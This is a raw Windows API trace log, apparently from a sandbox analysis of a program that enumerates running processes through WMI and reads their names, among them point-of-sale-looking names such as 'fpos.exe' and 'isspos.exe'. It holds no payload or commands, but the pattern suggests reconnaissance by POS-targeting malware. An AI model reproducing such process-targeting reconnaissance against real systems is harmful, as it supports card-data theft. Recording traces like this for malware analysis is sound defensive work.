0x3 [0225.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca918) returned 0x0 [0225.658] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca918, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.658] WbemDefPath:IUnknown:Release (This=0x5eca918) returned 0x3 [0225.658] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.658] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.658] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.658] WbemDefPath:IUnknown:Release (This=0x5ed0ae8) returned 0x2 [0225.659] WbemDefPath:IUnknown:Release (This=0x5ed0ae8) returned 0x1 [0225.659] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.659] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0ae8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0ae8) returned 0x0 [0225.659] WbemDefPath:IUnknown:AddRef (This=0x5ed0ae8) returned 0x3 [0225.659] WbemDefPath:IUnknown:Release (This=0x5ed0ae8) returned 0x2 [0225.659] WbemDefPath:IWbemPath:SetText (This=0x5ed0ae8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2812\"") returned 0x0 [0225.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.659] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.659] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.659] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.659] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.659] IWbemClassObject:Get (in: This=0x5ecdc30, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26febc0*=0, plFlavor=0x26febc4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fpos.exe", varVal2=0x0), pType=0x26febc0*=8, plFlavor=0x26febc4*=0) returned 0x0 [0225.659] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0225.659] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0225.659] IWbemClassObject:Get (in: This=0x5ecdc30, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26febc0*=8, plFlavor=0x26febc4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fpos.exe", varVal2=0x0), pType=0x26febc0*=8, plFlavor=0x26febc4*=0) returned 0x0 [0225.660] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0225.660] SysStringByteLen (bstr="fpos.exe") returned 0x10 [0225.660] CoTaskMemAlloc (cb=0x4) returned 0x5eca948 [0225.660] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca948, puReturned=0x26dde18 | out: apObjects=0x5eca948*=0x5ecddc8, puReturned=0x26dde18*=0x1) returned 0x0 [0225.661] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecddc8) returned 0x0 [0225.661] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.661] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.661] IUnknown:AddRef (This=0x5ecddc8) returned 0x3 [0225.661] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.661] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.661] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecddcc) returned 0x0 [0225.662] IMarshal:GetUnmarshalClass (in: This=0x5ecddcc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.662] IUnknown:Release (This=0x5ecddcc) returned 0x3 [0225.662] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.662] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.662] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.662] IUnknown:Release (This=0x5ecddc8) returned 0x2 [0225.662] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.662] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.662] IUnknown:QueryInterface (in: This=0x5ecddc8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecddc8) returned 0x0 [0225.662] IUnknown:AddRef (This=0x5ecddc8) returned 0x4 [0225.662] IUnknown:Release (This=0x5ecddc8) returned 0x3 [0225.662] IUnknown:Release (This=0x5ecddc8) returned 0x2 [0225.662] CoTaskMemFree (pv=0x5eca948) [0225.671] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.671] IUnknown:AddRef (This=0x5ecddc8) returned 0x3 [0225.671] IWbemClassObject:Get (in: This=0x5ecddc8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.671] IWbemClassObject:Get (in: This=0x5ecddc8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2820\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.671] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2820\"") returned 0x66 [0225.671] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2820\"") returned 0x66 [0225.671] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.672] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.672] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.672] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.673] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca948) returned 0x0 [0225.673] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca948, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.673] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca948, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ed0bc8) returned 0x0 [0225.673] WbemDefPath:IUnknown:Release (This=0x5eca948) returned 0x0 [0225.673] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ed0bc8) returned 0x0 [0225.673] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.674] WbemDefPath:IUnknown:AddRef (This=0x5ed0bc8) returned 0x3 [0225.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ed1a08) returned 0x0 [0225.674] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ed1a08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.674] WbemDefPath:IUnknown:Release (This=0x5ed1a08) returned 0x3 [0225.674] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.674] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.674] WbemDefPath:IUnknown:Release (This=0x5ed0bc8) returned 0x2 [0225.674] WbemDefPath:IUnknown:Release (This=0x5ed0bc8) returned 0x1 [0225.674] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.674] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed0bc8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ed0bc8) returned 0x0 [0225.674] WbemDefPath:IUnknown:AddRef (This=0x5ed0bc8) returned 0x3 [0225.674] WbemDefPath:IUnknown:Release (This=0x5ed0bc8) returned 0x2 [0225.674] WbemDefPath:IWbemPath:SetText (This=0x5ed0bc8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2820\"") returned 0x0 [0225.674] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.675] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.675] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.675] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.675] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.675] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.675] IWbemClassObject:Get (in: This=0x5ecddc8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ff424*=0, plFlavor=0x26ff428*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x26ff424*=8, plFlavor=0x26ff428*=0) returned 0x0 [0225.675] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0225.675] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0225.675] IWbemClassObject:Get (in: This=0x5ecddc8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ff424*=8, plFlavor=0x26ff428*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="isspos.exe", varVal2=0x0), pType=0x26ff424*=8, plFlavor=0x26ff428*=0) returned 0x0 [0225.675] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0225.675] SysStringByteLen (bstr="isspos.exe") returned 0x14 [0225.675] CoTaskMemAlloc (cb=0x4) returned 0x5ed1a38 [0225.675] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5ed1a38, puReturned=0x26dde18 | out: apObjects=0x5ed1a38*=0x5ecdf60, puReturned=0x26dde18*=0x1) returned 0x0 [0225.676] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecdf60) returned 0x0 [0225.676] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.676] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.677] IUnknown:AddRef (This=0x5ecdf60) returned 0x3 [0225.677] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.677] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.677] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecdf64) returned 0x0 [0225.677] IMarshal:GetUnmarshalClass (in: This=0x5ecdf64, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.677] IUnknown:Release (This=0x5ecdf64) returned 0x3 [0225.677] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.677] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.677] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.677] IUnknown:Release (This=0x5ecdf60) returned 0x2 [0225.677] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.677] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.677] IUnknown:QueryInterface (in: This=0x5ecdf60, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecdf60) returned 0x0 [0225.677] IUnknown:AddRef (This=0x5ecdf60) returned 0x4 [0225.677] IUnknown:Release (This=0x5ecdf60) returned 0x3 [0225.677] IUnknown:Release (This=0x5ecdf60) returned 0x2 [0225.677] CoTaskMemFree (pv=0x5ed1a38) [0225.678] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.678] IUnknown:AddRef (This=0x5ecdf60) returned 0x3 [0225.678] IWbemClassObject:Get (in: This=0x5ecdf60, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.678] IWbemClassObject:Get (in: This=0x5ecdf60, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2828\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.678] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2828\"") returned 0x66 [0225.678] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2828\"") returned 0x66 [0225.679] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.679] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.679] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.679] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.679] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ed1a38) returned 0x0 [0225.680] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ed1a38, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, 